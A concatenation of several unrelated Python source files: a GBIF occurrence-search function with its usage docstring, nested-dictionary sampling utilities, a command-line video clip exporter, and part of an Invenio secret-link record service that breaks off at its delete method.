lake surface with given elevation. Supports range queries, smaller,larger (e.g., ``5,30``,
whereas ``30,5`` wouldn't work)
:param geometry: [str] Searches for occurrences inside a polygon described in Well Known
Text (WKT) format. A WKT shape written as either POINT, LINESTRING, LINEARRING
POLYGON, or MULTIPOLYGON. Example of a polygon: ``((30.1 10.1, 20, 20 40, 40 40, 30.1 10.1))`` would be queried as http://bit.ly/1BzNwDq.
Polygons must have counter-clockwise ordering of points.
:param hasGeospatialIssue: [bool] Includes/excludes occurrence records which contain spatial
issues (as determined in our record interpretation), i.e. ``hasGeospatialIssue=TRUE``
returns only those records with spatial issues while ``hasGeospatialIssue=FALSE`` includes
only records without spatial issues. The absence of this parameter returns any
record with or without spatial issues.
:param issue: [str] One or more of many possible issues with each occurrence record. See
Details. Issues passed to this parameter filter results by the issue.
:param hasCoordinate: [bool] Return only occurence records with lat/long data (``True``) or
all records (``False``, default).
:param typeStatus: [str] Type status of the specimen. One of many options. See ?typestatus
:param recordNumber: [int] Number recorded by collector of the data, different from GBIF record
number. See http://rs.tdwg.org/dwc/terms/#recordNumber} for more info
:param lastInterpreted: [date] Date the record was last modified in GBIF, in ISO 8601 format:
yyyy, yyyy-MM, yyyy-MM-dd, or MM-dd. Supports range queries, smaller,larger (e.g.,
``1990,1991``, whereas ``1991,1990`` wouldn't work)
:param continent: [str] Continent. One of ``africa``, ``antarctica``, ``asia``, ``europe``, ``north_america``
(North America includes the Caribbean and reachies down and includes Panama), ``oceania``,
or ``south_america``
:param fields: [str] Default (``all``) returns all fields. ``minimal`` returns just taxon name,
key, latitude, and longitude. Or specify each field you want returned by name, e.g.
``fields = c('name','latitude','elevation')``.
:param mediatype: [str] Media type. Default is ``NULL``, so no filtering on mediatype. Options:
``NULL``, ``MovingImage``, ``Sound``, and ``StillImage``
:param limit: [int] Number of results to return. Default: ``300``
:param offset: [int] Record to start at. Default: ``0``
:param facet: [str] a character vector of length 1 or greater
:param establishmentMeans: [str] EstablishmentMeans, possible values include: INTRODUCED,
INVASIVE, MANAGED, NATIVE, NATURALISED, UNCERTAIN
:param facetMincount: [int] minimum number of records to be included in the faceting results
:param facetMultiselect: [bool] Set to ``True`` to still return counts for values that are not currently
filtered. See examples. Default: ``False``
:return: A dictionary
Usage::
from pygbif import occurrences
occurrences.search(taxonKey = 3329049)
# Return 2 results, this is the default by the way
occurrences.search(taxonKey=3329049, limit=2)
# Instead of getting a taxon key first, you can search for a name directly
# However, note that using this approach (with `scientificName="..."`)
# you are getting synonyms too. The results for using `scientifcName` and
# `taxonKey` parameters are the same in this case, but I wouldn't be surprised if for some
# names they return different results
occurrences.search(scientificName = 'Ursus americanus')
from pygbif import species
key = species.name_backbone(name = 'Ursus americanus', rank='species')['usageKey']
occurrences.search(taxonKey = key)
# Search by dataset key
occurrences.search(datasetKey='7b5d6a48-f762-11e1-a439-00145eb45e9a', limit=20)
# Search by catalog number
occurrences.search(catalogNumber="49366", limit=20)
# occurrences.search(catalogNumber=["49366","Bird.27847588"], limit=20)
# Use paging parameters (limit and offset) to page. Note the different results
# for the two queries below.
occurrences.search(datasetKey='7b5d6a48-f762-11e1-a439-00145eb45e9a', offset=10, limit=5)
occurrences.search(datasetKey='7b5d6a48-f762-11e1-a439-00145eb45e9a', offset=20, limit=5)
# Many dataset keys
# occurrences.search(datasetKey=["50c9509d-22c7-4a22-a47d-8c48425ef4a7", "7b5d6a48-f762-11e1-a439-00145eb45e9a"], limit=20)
# Search by collector name
res = occurrences.search(recordedBy="smith", limit=20)
[ x['recordedBy'] for x in res['results'] ]
# Many collector names
# occurrences.search(recordedBy=["smith","<NAME>"], limit=20)
# recordedByID
occurrences.search(recordedByID="https://orcid.org/0000-0003-1691-239X", limit = 3)
# identifiedByID
occurrences.search(identifiedByID="https://orcid.org/0000-0003-1691-239X", limit = 3)
# Search for many species
splist = ['Cyanocitta stelleri', 'Junco hyemalis', 'Aix sponsa']
keys = [ species.name_suggest(x)[0]['key'] for x in splist ]
out = [ occurrences.search(taxonKey = x, limit=1) for x in keys ]
[ x['results'][0]['speciesKey'] for x in out ]
# Search - q parameter
occurrences.search(q = "kingfisher", limit=20)
## spell check - only works with the `search` parameter
### spelled correctly - same result as above call
occurrences.search(q = "kingfisher", limit=20, spellCheck = True)
### spelled incorrectly - stops with suggested spelling
occurrences.search(q = "kajsdkla", limit=20, spellCheck = True)
### spelled incorrectly - stops with many suggested spellings
### and number of results for each
occurrences.search(q = "helir", limit=20, spellCheck = True)
# Search on latitidue and longitude
occurrences.search(decimalLatitude=50, decimalLongitude=10, limit=2)
# Search on a bounding box
## in well known text format
occurrences.search(geometry='POLYGON((30.1 10.1, 10 20, 20 40, 40 40, 30.1 10.1))', limit=20)
from pygbif import species
key = species.name_suggest(q='Aesculus hippocastanum')[0]['key']
occurrences.search(taxonKey=key, geometry='POLYGON((30.1 10.1, 10 20, 20 40, 40 40, 30.1 10.1))', limit=20)
## multipolygon
wkt = 'MULTIPOLYGON(((-123 38, -123 43, -116 43, -116 38, -123 38)),((-97 41, -97 45, -93 45, -93 41, -97 41)))'
occurrences.search(geometry = wkt, limit = 20)
# Search on country
occurrences.search(country='US', limit=20)
occurrences.search(country='FR', limit=20)
occurrences.search(country='DE', limit=20)
# Get only occurrences with lat/long data
occurrences.search(taxonKey=key, hasCoordinate=True, limit=20)
# Get only occurrences that were recorded as living specimens
occurrences.search(taxonKey=key, basisOfRecord="LIVING_SPECIMEN", hasCoordinate=True, limit=20)
# Get occurrences for a particular eventDate
occurrences.search(taxonKey=key, eventDate="2013", limit=20)
occurrences.search(taxonKey=key, year="2013", limit=20)
occurrences.search(taxonKey=key, month="6", limit=20)
# Get occurrences based on depth
key = species.name_backbone(name='Salmo salar', kingdom='animals')['usageKey']
occurrences.search(taxonKey=key, depth="5", limit=20)
# Get occurrences based on elevation
key = species.name_backbone(name='<NAME>', kingdom='animals')['usageKey']
occurrences.search(taxonKey=key, elevation=50, hasCoordinate=True, limit=20)
# Get occurrences based on institutionCode
occurrences.search(institutionCode="TLMF", limit=20)
# Get occurrences based on collectionCode
occurrences.search(collectionCode="Floristic Databases MV - Higher Plants", limit=20)
# Get only those occurrences with spatial issues
occurrences.search(taxonKey=key, hasGeospatialIssue=True, limit=20)
# Search using a query string
occurrences.search(q="kingfisher", limit=20)
# Range queries
## See Detail for parameters that support range queries
### this is a range depth, with lower/upper limits in character string
occurrences.search(depth='50,100')
## Range search with year
occurrences.search(year='1999,2000', limit=20)
## Range search with latitude
occurrences.search(decimalLatitude='29.59,29.6')
# Search by specimen type status
## Look for possible values of the typeStatus parameter looking at the typestatus dataset
occurrences.search(typeStatus = 'allotype')
# Search by specimen record number
## This is the record number of the person/group that submitted the data, not GBIF's numbers
## You can see that many different groups have record number 1, so not super helpful
occurrences.search(recordNumber = 1)
# Search by last time interpreted: Date the record was last modified in GBIF
## The lastInterpreted parameter accepts ISO 8601 format dates, including
## yyyy, yyyy-MM, yyyy-MM-dd, or MM-dd. Range queries are accepted for lastInterpreted
occurrences.search(lastInterpreted = '2014-04-01')
# Search by continent
## One of africa, antarctica, asia, europe, north_america, oceania, or south_america
occurrences.search(continent = 'south_america')
occurrences.search(continent = 'africa')
occurrences.search(continent = 'oceania')
occurrences.search(continent = 'antarctica')
# Search for occurrences with images
occurrences.search(mediatype = 'StillImage')
occurrences.search(mediatype = 'MovingImage')
x = occurrences.search(mediatype = 'Sound')
[z['media'] for z in x['results']]
# Query based on issues
occurrences.search(taxonKey=1, issue='DEPTH_UNLIKELY')
occurrences.search(taxonKey=1, issue=['DEPTH_UNLIKELY','COORDINATE_ROUNDED'])
# Show all records in the Arizona State Lichen Collection that cant be matched to the GBIF
# backbone properly:
occurrences.search(datasetKey='84c0e1a0-f762-11e1-a439-00145eb45e9a', issue=['TAXON_MATCH_NONE','TAXON_MATCH_HIGHERRANK'])
# If you pass in an invalid polygon you get hopefully informative errors
### the WKT string is fine, but GBIF says bad polygon
wkt = 'POLYGON((-178.59375 64.83258989321493,-165.9375 59.24622380205539,
-147.3046875 59.065977905449806,-130.78125 51.04484764446178,-125.859375 36.70806354647625,
-112.1484375 23.367471303759686,-105.1171875 16.093320185359257,-86.8359375 9.23767076398516,
-82.96875 2.9485268155066175,-82.6171875 -14.812060061226388,-74.8828125 -18.849111862023985,
-77.34375 -47.661687803329166,-84.375 -49.975955187343295,174.7265625 -50.649460483096114,
179.296875 -42.19189902447192,-176.8359375 -35.634976650677295,176.8359375 -31.835565983656227,
163.4765625 -6.528187613695323,152.578125 1.894796132058301,135.703125 4.702353722559447,
127.96875 15.077427674847987,127.96875 23.689804541429606,139.921875 32.06861069132688,
149.4140625 42.65416193033991,159.2578125 48.3160811030533,168.3984375 57.019804336633165,
178.2421875 59.95776046458139,-179.6484375 61.16708631440347,-178.59375 64.83258989321493))'
occurrences.search(geometry = wkt)
# Faceting
## return no occurrence records with limit=0
x = occurrences.search(facet = "country", limit = 0)
x['facets']
## also return occurrence records
x = occurrences.search(facet = "establishmentMeans", limit = 10)
x['facets']
x['results']
## multiple facet variables
x = occurrences.search(facet = ["country", "basisOfRecord"], limit = 10)
x['results']
x['facets']
x['facets']['country']
x['facets']['basisOfRecord']
x['facets']['basisOfRecord']['count']
## set a minimum facet count
x = occurrences.search(facet = "country", facetMincount = 30000000L, limit = 0)
x['facets']
## paging per each faceted variable
### do so by passing in variables like "country" + "_facetLimit" = "country_facetLimit"
### or "country" + "_facetOffset" = "country_facetOffset"
x = occurrences.search(
facet = ["country", "basisOfRecord", "hasCoordinate"],
country_facetLimit = 3,
basisOfRecord_facetLimit = 6,
limit = 0
)
x['facets']
# requests package options
## There's an acceptable set of requests options (['timeout', 'cookies', 'auth',
## 'allow_redirects', 'proxies', 'verify', 'stream', 'cert']) you can pass
## in via **kwargs, e.g., set a timeout
x = occurrences.search(timeout = 1)
"""
url = gbif_baseurl + "occurrence/search"
args = {
"taxonKey": taxonKey,
"repatriated": repatriated,
"kingdomKey": kingdomKey,
"phylumKey": phylumKey,
"classKey": classKey,
"orderKey": orderKey,
"familyKey": familyKey,
"genusKey": genusKey,
"subgenusKey": subgenusKey,
"scientificName": scientificName,
"country": country,
"publishingCountry": publishingCountry,
"hasCoordinate": bool2str(hasCoordinate),
"typeStatus": typeStatus,
"recordNumber": recordNumber,
"lastInterpreted": lastInterpreted,
"continent": continent,
"geometry": geometry,
"recordedBy": recordedBy,
"recordedByID": recordedByID,
"identifiedByID": identifiedByID,
"basisOfRecord": basisOfRecord,
"datasetKey": datasetKey,
"eventDate": eventDate,
"catalogNumber": catalogNumber,
"year": year,
"month": month,
"decimalLatitude": decimalLatitude,
"decimalLongitude": decimalLongitude,
"elevation": elevation,
"depth": depth,
"institutionCode": institutionCode,
"collectionCode": collectionCode,
"hasGeospatialIssue": bool2str(hasGeospatialIssue),
"issue": issue,
"q": q,
"spellCheck": bool2str(spellCheck),
"mediatype": mediatype,
"limit": limit,
"offset": offset,
"establishmentMeans": establishmentMeans,
"facetMincount": facetMincount,
"facet": facet,
"facetMultiselect": bool2str(facetMultiselect),
}
gbif_kwargs = {key: kwargs[key] for key in kwargs if key not in requests_argset}
if gbif_kwargs is not None:
xx = dict(
zip([re.sub("_", ".", x) for x in gbif_kwargs.keys()], gbif_kwargs.values())
)
args.update(xx)
kwargs = {key: kwargs[key] for key in kwargs if key in requests_argset}
out = gbif_GET(url, args, **kwargs)
return out
|
"""Functions for manipulation of the nested dictionaries.
"""
import os
import functools
import operator
from typing import Callable
from abc import ABC
import random
import numpy as np
# from skimage.io import imread
# from skimage.transform import resize
# from imageio import imread
from PIL import Image
import logging
Logger = logging.getLogger('fsl.utils.nested_dict')
from . import data
def random_split(a:list, s:int):
"""Randomly split a list `a` into two parts with the first one having length `s`.
"""
assert 0 <= s <= len(a)
idx = list(range(len(a))); random.shuffle(idx)
# a1 = [a[idx[i]] for i in range(0, min(s,len(a)))]
# a2 = [a[idx[i]] for i in range(max(0,s),len(a))]
a1 = [a[idx[i]] for i in range(0, s)]
a2 = [a[idx[i]] for i in range(s,len(a))]
return a1, a2
# # equivalent to
# aa = a.copy(); random.shuffle(aa)
# return aa[:s]; aa[s:]
def nested_dict(k, v):
"""Create a nested dictionary by keys.
Example
-------
`nested_dict(['a','b','c'], 0)` returns `{'a':{'b':{'c':0}}}`.
"""
if type(k) in {list, tuple}:
d = {k[-1]: v}
for q in k[:-1][::-1]:
d = {q: d}
return d
else:
return {k: v}
def getitem(d:dict, k:list):
"""Get an item by keys in a nested dictionary.
Example
-------
For the nested dictionary `{'a':{'b':{'c':0}}}`, query with the key `['a','b','c']` returns 0;
and query with the key `['a','b']` returns `{'c':0}`.
"""
# retrieve from a nested dictionary
# possible to use dict.get() or operator.getitem()
return functools.reduce(dict.__getitem__, k, d)
def setitem(d:dict, k, v):
"""Set an item by keys in a nested dictionary.
Example: for the nested dictionary `d={'a':{'b':{'c':0}}}`, `k=['a','b','c']` and `v=1` set the dictionary to `d={'a':{'b':{'c':1}}}`.
"""
assert type(d) is dict
if type(k) in {list, tuple}:
try:
# print(d,k,v)
setitem(d[k[0]], k[1:], v)
except:
d[k[0]] = nested_dict(k[1:], v) if len(k) > 1 else v
else:
d[k] = v
# def setitem(d, k, v):
# # works only if `d` has the key `k[:-1`
# p = functools.reduce(dict.__getitem__, k[:-1], d)
# p[k[-1]] = v
def _get_paths_pos(d:dict, lvl:int=None) -> list:
L = []
if (lvl is None) or (type(lvl) is int and lvl >= 0):
for k,v in d.items():
# print(lvl,k,v)
# assert type(k) is str # not necessary
if type(v) is dict: # empty dictionary must be handled
foo = _get_paths_pos(v, None if lvl is None else lvl-1)
if foo:
# L += [k+sep+t for t in foo] # if a separator is used, working only for string keys
poo = []
for t in foo:
if type(t) is list:
poo.append([k, *t])
else:
poo.append([k, t])
L += poo
# L += [[k, *t] for t in foo] # trouble if t is not a list
else:
L.append([k])
else:
L.append([k])
return L
def _get_paths_neg(d:dict, lvl:int):
assert lvl < 0
foo = [f[:lvl] for f in _get_paths_pos(d, None)]
paths = []
for f in foo:
if f not in paths:
paths.append(f)
return paths
def get_paths(d:dict, lvl:int=None):
"""Get all acessing paths (chains of keys) of a nested dictionary.
Example: for `d={'a':{'b':{'c':0, 'd':1}}}`, `lvl=None` returns `[['a','b','c'], ['a','b','d']]`; while `lvl=0` returns `[['a']]`, and `lvl=-1` returns `[['a','b']]`.
"""
if lvl is None:
return _get_paths_pos(d, lvl)
else:
if lvl>=0:
return _get_paths_pos(d, lvl)
else:
return _get_paths_neg(d, lvl)
# raise ValueError('Level must be an integer or None.')
def sub_dict(d:dict, paths:list, *, compl=False):
"""Get a sub dictionary from a set of paths.
If `compl` is True then take the complementary of the given paths.
Example: for `d={'a':{'b':{'c':0, 'd':1}}, 'e':{'f':2, 'g':3}}`, `path=[['a'],['e','f']]` returns `{'a':{'b':{'c':0, 'd':1}}, 'e':{'f':2}}`. When `compl=True` then `path=[['a']]` returns `{'e':{'f':2, 'g':3}}`.
"""
# k = keys[0]
# assert type(k) in {list, tuple}
# res = nested_dict(k, fsl.utils.data.get_item(d, k))
res = {}
if compl:
pp = []
for p in get_paths(d):
for q in paths:
if q == p[:len(q)]:
break
else:
pp.append(p)
else:
pp = paths
for k in pp:
# assert type(k) in {list, tuple}
setitem(res, k, getitem(d, k))
return res
def random_split_level(d:dict, ratio:float, lvl:int=None, *, index:int=None):
"""Randomly split a nested dictionary at a given level.
"""
_paths = get_paths(d, lvl)
if index is None:
p1, p2 = random_split(_paths, int(len(_paths)*ratio))
else: # if split index is provided
p1, p2 = random_split(_paths, index)
# return p1,p2
return sub_dict(d, p1), sub_dict(d, p2)
def random_split_level_local(d:dict, ratio:float, lvl:int=None, *, index:int=None):
"""Locally split a nested dictionary at a given level.
"""
# assert lvl > 0
d1, d2 = {}, {}
if lvl is None:
paths = _get_paths_neg(d, -1)
else:
paths = get_paths(d, lvl-1)
for p in paths:
s1, s2 = random_split_level(getitem(d, p), ratio, 0, index=index)
setitem(d1, p, s1)
setitem(d2, p, s2)
return d1, d2
def intersect(paths1:list, paths2:list):
"""Return all elements of `paths1` that have a root in `paths2`.
"""
foo = []
for p1 in paths1:
for p2 in paths2:
if p1[:len(p2)] == p2:
foo.append(p1)
return foo
def common_roots(paths1:list, paths2:list):
"""Common roots of two paths.
"""
foo = []
for p1 in paths1:
for p2 in paths2:
if p1[:len(p2)] == p2:
foo.append(p2)
elif p2[:len(p1)] == p1:
foo.append(p1)
# return list(set(foo)) # <- not hashable
goo = [] # remove redundant elements
for x in foo:
if not x in goo:
goo.append(x)
return goo
def sample(d:dict, n:int, lvl:int=None, paths:list=None, *, replace=False):
"""Generate random samples from a nested dictionary at a given level.
"""
_paths = get_paths(d, lvl)
if paths:
_paths = intersect(_paths, paths)
if replace:
p = random.choices(_paths, k=n) # with replacement
# assert len(p) == n
return sub_dict(d, p)
else:
if len(_paths) < n:
raise ValueError('No enough elements.')
random.shuffle(_paths)
return sub_dict(d, _paths[:n])
def sample_local(d:dict, n:int, lvl:int=None, *, replace=False):
"""Locally generate random samples from a nested dictionary at a given level.
"""
res = {}
if lvl is None:
paths = _get_paths_neg(d, -1)
else:
paths = get_paths(d, lvl-1)
for p in paths:
s = sample(getitem(d, p), n, 0, replace=replace)
setitem(res, p, s)
# for p in get_paths(d, lvl):
# s = sample(getitem(d, p[:-1]), n, 0, replace=replace)
# setitem(res, p[:-1], s)
return res
# Sampling of the support and query set
def support_query_sampling(task:dict, ns:int, nq:int=None, lvl:int=None, *, split=False):
"""
"""
if split:
sd, qd = random_split_level_local(task, 0, lvl, index=ns)
if nq:
qd = sample_local(qd, nq, lvl)
else:
sd = sample_local(task, ns, lvl, replace=False) # dict of the support set
qd = sample_local(task, nq, lvl, replace=False) if nq else task.copy() # dict of the query set
return sd, qd
def from_folder(rootdir:str, func:Callable=None, filt:Callable=None) -> dict:
"""Create a nested dictionary representing the structure of a folder.
Arguments
---------
rootdir: path of a root folder
func: function processing the content of a file, optional
filt: boolean function filtering the input file names, optional
References
----------
- https://code.activestate.com/recipes/577879-create-a-nested-dictionary-from-oswalk/
- https://stackoverflow.com/questions/28225552/is-there-a-recursive-version-of-the-dict-get-built-in
- https://lerner.co.il/2014/05/11/creating-python-dictionaries-reduce/
"""
res = {}
# count = 0 # counter of the number of leaves
rootdir = data.regularize_filename(rootdir)
# rootdir = rootdir.rstrip(os.sep) # remove the trailing '/'
start = rootdir.rfind(os.sep) + 1
if filt is None:
filt = lambda x: True
for path, _, files in os.walk(rootdir):
folders = path[start:].split(os.sep)
subdir = {f: func(os.path.join(path, f)) if func else None for f in files if filt(f)}
# # equivalent to:
# subdir = dict.fromkeys(files)
# for f in files: # load image files if found
# if func:
# subdir[f] = func(os.path.join(path, f))
# else:
# subdir[f] = None
# count += len(files)
if subdir: # do not add node, in case of empty dictionary
setitem(res, folders, subdir)
# pop out the root level item
return res.popitem()[1] if res else res
def count_leaves(d:dict) -> int:
"""Count the number of leaves in a nested dictionary.
"""
n = 0
for k,v in d.items():
if type(v) is dict:
n += count_leaves(v)
else:
n += 1
return n
# count_leaves(Data)/20 == 1623
def count_nodes(d:dict) -> int:
"""Count the number of nodes (leaves included) in a nested dictionary.
"""
n = len(d.keys())
for k,v in d.items():
if type(v) is dict:
n += count_nodes(v)
return n
def count_leafnodes(d:dict) -> int:
"""Count the number of nodes with leaves in a nested dictionary.
"""
n = 0
if d:
m = 0
for k,v in d.items():
if type(v) is dict:
m += count_leafnodes(v)
return n + max(m,1)
return n
def leaves_to_array(d:dict, lvl:int=None):
def _leaves_to_array(d:dict):
res = [getitem(d, p) for p in get_paths(d)]
return np.asarray(res)
if lvl is None:
return _leaves_to_array(d)
else:
paths = get_paths(d, lvl)
res = []
for p in paths:
foo = getitem(d, p)
if type(foo) is dict:
res.append(_leaves_to_array(foo))
else:
res.append(foo)
return np.asarray(res)
# return np.concatenate(res)
def element_to_index(a:list):
try:
b = list(set(a)) # only works for hashable elements
except:
b = []
for u in a:
if u not in b:
b.append(u)
d = []
for l in a:
for n,p in enumerate(b):
if p==l:
break
d.append(n)
return d
|
<filename>main.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Dependencies
import os
import numpy as np
import pandas as pd
import bom1.bom1 as bom1
import argparse
import difflib
import re
import time
def main():
#Set up the arguments.
parser = bom1.parser()
args = parser.parse_args()
#If args.no_normalize, then we should not normalize.
if args.no_normalize:
args.normalize = False
#A few assertions
assert args.prepad >= 0, f'args.prepad should be 0 or greater. args.prepad: {args.prepad}'
assert args.postpad >= 0, f'args.postpad should be 0 or greater. args.postpad: {args.postpad}'
if not args.silent:
#Print the welcome message.
bom1.welcome()
#Load the clips
clips = bom1.load_clips(load_empty = args.load_empty)
n = len(clips)
#Make sure that we have the ./export folder.
if not os.path.exists('./export'):
os.mkdir('./export')
#Construct the masks for each query.
if args.clip_name is not None:
clipname_mask = (clips['name'].str.findall(args.clip_name).astype(bool)).to_numpy()
else:
clipname_mask = np.ones(n).astype(bool)
if args.min_rating != 0:
minrating_mask = (args.min_rating <= clips['rating']).to_numpy()
else:
minrating_mask = np.ones(n).astype(bool)
if args.max_rating != 10:
maxrating_mask = (clips['rating'] <= args.max_rating).to_numpy()
else:
maxrating_mask = np.ones(n).astype(bool)
if args.min_duration != 0:
minduration_mask = (args.min_duration <= clips['duration']).to_numpy()
else:
minduration_mask = np.ones(n).astype(bool)
if args.max_duration != np.inf:
maxduration_mask = (clips['duration'] <= args.max_duration).to_numpy()
else:
maxduration_mask = np.ones(n).astype(bool)
if args.tag != '':
tags = [tag for tag in clips['tag'].unique() if re.search(args.tag, tag) is not None]
tags_mask = (clips['tag'].isin(tags)).to_numpy()
else:
tags_mask = np.ones(n).astype(bool)
if args.min_t1 != 0:
mint1_mask = args.min_t1 <= clips['t1'].apply(lambda x : bom1.timestamp_to_seconds(x)).to_numpy()
else:
mint1_mask = np.ones(n).astype(bool)
if args.max_t1 != np.inf:
maxt1_mask = clips['t1'].apply(lambda x : bom1.timestamp_to_seconds(x)).to_numpy() <= args.max_t1
else:
maxt1_mask = np.ones(n).astype(bool)
if args.min_t2 != 0:
mint2_mask = args.min_t2 <= clips['t2'].apply(lambda x : bom1.timestamp_to_seconds(x)).to_numpy()
else:
mint2_mask = np.ones(n).astype(bool)
if args.max_t2 != np.inf:
maxt2_mask = clips['t2'].apply(lambda x : bom1.timestamp_to_seconds(x)).to_numpy() <= args.max_t2
else:
maxt2_mask = np.ones(n).astype(bool)
if args.include_placeholder:
#We should include placeholders.
placeholder_mask = np.ones(n).astype(bool)
else:
#Only keep clips where the name is not "placeholder".
placeholder_mask = clips['name'].str.lower() != 'placeholder'
if args.no_prefix:
prefix = ''
else:
prefix = clips['tag']+'_C'+clips['nclip'].astype(str).str.zfill(2)+'_R'+clips['rating'].astype(str).str.zfill(2)+'_'
#Stitch together the pathout.
clips['pathout'] = ('./export/'+prefix+clips['name']+'.'+args.file_type)
#Combine all of the masks into a final single mask, and cut out the relevant clips.
final_mask = (clipname_mask) & (minrating_mask) & (maxrating_mask) & (minduration_mask) & (maxduration_mask) & (tags_mask)\
& (mint1_mask) & (maxt1_mask) & (mint2_mask) & (maxt2_mask) & (placeholder_mask)
clips_final = clips.copy().loc[final_mask]
#Check if there are any clips.
if len(clips_final) == 0:
if not np.any(clipname_mask):
print('There are no clips with the specified name.')
close_match = difflib.get_close_matches(args.clip_name, list(clips['name']))
if close_match != []:
print(f'Did you perhaps mean {close_match}?')
else:
print('No clips met the specified query.')
return
n = len(clips_final)
if not args.silent:
bom1.print_clips(clips_final)
#If we pass the --list args, then it should only print.
if args.list:
return
#If args.silent, then we don't prompt the user.
if not args.silent:
if n > 1:
print('')
prompt = input(f'A total of {n} clips were found. Do you want to export as {args.file_type}? [y/n] ').lower().strip() #Ask for confirmation if several clips are exported.
print('')
else:
prompt = input(f'A single clip was found. Do you want to export as {args.file_type}? [y/n] ').lower().strip() #Ask for confirmation if several clips are exported.
print('')
if (prompt != 'y') and (prompt != ''):
return
#Start time before clipping.
start_time = time.time()
#Call to the clipper.
bom1.clip(clips_final['t1'].tolist(), clips_final['t2'].tolist(), clips_final['link'].tolist(), clips_final['pathout'], args)
end_time = time.time()
if not args.silent:
print('')
print("Time elapsed: {:.2f} seconds.".format(end_time-start_time))
if __name__ == '__main__':
main() |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020-2021 CERN.
# Copyright (C) 2020-2021 Northwestern University.
# Copyright (C) 2021 <NAME>.
#
# Invenio-RDM-Records is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""RDM Secret Link Service."""
from datetime import datetime
import arrow
from flask_babelex import lazy_gettext as _
from invenio_db import db
from invenio_drafts_resources.services.records import RecordService
from invenio_records_resources.services.records.schema import \
ServiceSchemaWrapper
from invenio_records_resources.services.uow import RecordCommitOp, unit_of_work
from marshmallow.exceptions import ValidationError
from sqlalchemy.orm.exc import NoResultFound
from ...secret_links.errors import InvalidPermissionLevelError
class SecretLinkService(RecordService):
"""RDM Secret Link service."""
def link_result_item(self, *args, **kwargs):
"""Create a new instance of the resource unit."""
return self.config.link_result_item_cls(*args, **kwargs)
def link_result_list(self, *args, **kwargs):
"""Create a new instance of the resource list."""
return self.config.link_result_list_cls(*args, **kwargs)
def get_parent_and_record_or_draft(self, _id):
"""Return parent and (record or draft)."""
try:
record, parent = self._get_record_and_parent_by_id(_id)
except NoResultFound:
record, parent = self._get_draft_and_parent_by_id(_id)
return record, parent
@property
def schema_secret_link(self):
"""Schema for secret links."""
return ServiceSchemaWrapper(
self, schema=self.config.schema_secret_link
)
def _validate_secret_link_expires_at(
self, expires_at, is_specified=True, secret_link=None
):
"""Validate the given expiration date.
If a ``secret_link`` is specified, the validity of setting its
expiration date to ``expires_at`` will be checked additionally.
The ``is_specified`` flag hints at if the value of ``expires_at``
was set in the given data, or if it was omitted (which makes a
difference in patch operations).
"""
if expires_at and is_specified:
# if the expiration date was specified, check if it's in the future
expires_at = arrow.get(expires_at).to("utc").datetime
expires_at = expires_at.replace(tzinfo=None)
if expires_at < datetime.utcnow():
raise ValidationError(
message=_("Expiration date must be set to the future"),
field_name="expires_at",
)
if secret_link is not None:
# if we're updating an existing secret link, we need to do some
# more checks...
# we interpret explicitly setting 'expires_at = null/None' as
# removing the expiration date (semantically different from not
# specifying an 'expires_at' value at all, at least for updates)
increases_expiration = (
is_specified and not expires_at and secret_link.expires_at
) or (
expires_at
and secret_link.expires_at
and expires_at > secret_link.expires_at
)
if increases_expiration:
# it's not a problem to reduce the validity of a token (*),
# but increasing its lifespan would require a new signature,
# and thus a new token
# (*) in that case, the permission generator will still say
# no, even if the signature is still valid
raise ValidationError(
message=_("Cannot postpone expiration of links"),
field_name="expires_at",
)
elif expires_at and expires_at < datetime.utcnow():
raise ValidationError(
message=_("Expiration date must be set to the future"),
field_name="expires_at",
)
return expires_at
@unit_of_work()
def create(
self,
identity,
id_,
data,
links_config=None,
uow=None
):
"""Create a secret link for a record (resp. its parent)."""
record, parent = self.get_parent_and_record_or_draft(id_)
# Permissions
self.require_permission(identity, "manage", record=record)
# Validation
data, __ = self.schema_secret_link.load(
data, context=dict(identity=identity), raise_errors=True
)
expires_at = self._validate_secret_link_expires_at(
data.get("expires_at")
)
if "permission" not in data:
raise ValidationError(
_("An access permission level is required"),
field_name="permission",
)
# Creation
try:
link = parent.access.links.create(
permission_level=data["permission"],
expires_at=expires_at,
extra_data=data.get("extra_data", {}),
)
except InvalidPermissionLevelError:
raise ValidationError(
_("Invalid access permission level."),
field_name="permission",
)
# Commit
uow.register(RecordCommitOp(parent))
if record:
uow.register(RecordCommitOp(record))
# Index all child records of the parent
self._index_related_records(record, parent, uow=uow)
return self.link_result_item(
self,
identity,
link,
links_config=links_config,
)
def read_all(
self,
identity,
id_,
links_config=None,
):
"""Read the secret links of a record (resp. its parent)."""
record, parent = self.get_parent_and_record_or_draft(id_)
# Permissions
self.require_permission(identity, "manage", record=record)
# Fetching
links = parent.access.links.resolve_all()
return self.link_result_list(
service=self,
identity=identity,
results=links,
links_config=links_config,
)
def read(
self,
identity,
id_,
link_id,
links_config=None,
):
"""Read a specific secret link of a record (resp. its parent)."""
record, parent = self.get_parent_and_record_or_draft(id_)
# Permissions
self.require_permission(identity, "manage", record=record)
# Fetching
link_ids = [link.link_id for link in parent.access.links]
if str(link_id) not in link_ids:
raise LookupError(str(link_id))
link_idx = link_ids.index(link_id)
link = parent.access.links[link_idx].resolve()
return self.link_result_item(
self,
identity,
link,
links_config=links_config,
)
@unit_of_work()
def update(
self,
identity,
id_,
link_id,
data,
links_config=None,
uow=None,
):
"""Update a secret link for a record (resp. its parent)."""
record, parent = self.get_parent_and_record_or_draft(id_)
# Permissions
self.require_permission(identity, "manage", record=record)
# Fetching (required for parts of the validation)
link_ids = [link.link_id for link in parent.access.links]
if str(link_id) not in link_ids:
raise LookupError(str(link_id))
link_idx = link_ids.index(link_id)
link = parent.access.links[link_idx].resolve()
# Validation
data, __ = self.schema_secret_link.load(
data, context=dict(identity=identity), raise_errors=True
)
permission = data.get("permission")
expires_at = self._validate_secret_link_expires_at(
data.get("expires_at"),
is_specified=("expires_at" in data),
secret_link=link,
)
# Update
# we can't update the link's extra data, as that is encoded
# in the token and would thus require a new token
link.expires_at = expires_at or link.expires_at
link.permission_level = permission or link.permission_level
# Commit
uow.register(RecordCommitOp(parent))
if record:
uow.register(RecordCommitOp(record))
# Index all child records of the parent
self._index_related_records(record, parent, uow=uow)
return self.link_result_item(
self,
identity,
link,
links_config=links_config,
)
@unit_of_work()
def delete(
self,
identity,
id_,
link_id,
links_config=None,
uow=None
):
"""Delete a secret link for a record (resp. its parent)."""
